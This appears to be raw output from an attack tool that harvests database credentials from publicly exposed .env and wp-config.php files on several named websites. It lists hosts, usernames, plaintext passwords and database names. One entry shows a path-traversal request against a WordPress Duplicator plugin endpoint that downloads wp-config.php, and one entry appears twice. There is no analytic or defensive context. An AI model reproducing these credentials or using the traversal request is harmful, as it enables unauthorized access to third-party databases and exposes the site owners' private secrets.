 TargetDB = ec2-15-206-194-176.ap-south-1.compute.amazonaws.com/.env
 Host:  127.0.0.1
 user:  beena
 pass:  'Finnair9090@)(*&^'
 DB:    rams
---------------------
 TargetDB = plus.findmydoctor.pk/.env
 Host:  127.0.0.1
 user:  "hstfmd"
 pass:  "Siddiqui92!"
 DB:    "harisdoctor"
---------------------
Full Config Path  : http://ne-molchi.ru/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php
 Host:  localhost
 user:  ct57717_nemolchi
 pass:  kBT3GTj8
 DB:    ct57717_nemolchi
---------------------
 TargetDB = daquythiennhien.us/.env
 Host:  127.0.0.1
 user:  ki482205_colorpngfile
 pass:  "L_COz?C#My7&"
 DB:    ki482205_colorpng
---------------------
 TargetDB = daquythiennhien.us/.env
 Host:  127.0.0.1
 user:  ki482205_colorpngfile
 pass:  "L_COz?C#My7&"
 DB:    ki482205_colorpng
---------------------
